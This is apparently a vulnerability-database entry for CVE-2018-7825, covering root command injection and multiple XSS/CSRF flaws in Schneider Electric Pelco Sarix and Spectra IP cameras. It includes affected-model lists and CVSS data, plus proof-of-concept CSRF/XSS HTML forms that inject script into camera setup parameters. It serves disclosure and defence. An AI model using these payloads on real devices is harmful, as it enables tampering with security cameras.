Find a vulnerability
Search criteria
246 vulnerabilities by Schneider Electric SE
VAR-201905-1049
Vulnerability from variot - Updated: 2025-01-30 22:13A Command Injection vulnerability exists in the web-based GUI of the 1st Gen PelcoSarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1049",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1s_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7825",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2018-7825",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-16261",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-7825",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7825",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-7825",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16261",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-911",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-911"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Command Injection vulnerability exists in the web-based GUI of the 1st Gen PelcoSarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone 